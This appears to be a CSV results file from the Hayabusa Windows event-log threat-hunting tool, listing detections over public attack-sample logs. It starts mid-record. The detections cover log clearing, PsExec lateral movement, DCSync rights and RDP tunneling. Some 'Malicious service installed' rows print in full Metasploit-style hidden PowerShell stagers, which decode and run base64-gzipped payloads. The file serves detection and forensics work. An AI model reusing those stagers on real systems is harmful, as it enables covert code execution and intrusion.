I1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk  :  Workstation evil.internal.corp  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$  :  Workstation EXCHANGE  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$  :  Workstation: EXCHANGE  :  IP Address: 192.168.111.87  :  Port: 58128  :  LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server  :  Workstation: PC02  :  IP Address: -  :  Port: -  :  LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x21f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 49164  :  LogonID: 0x45120  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4a26d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49168  :  LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49169  :  LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1414c8  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01  :  Workstation: PC01  :  IP Address: -  :  Port: -  :  LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
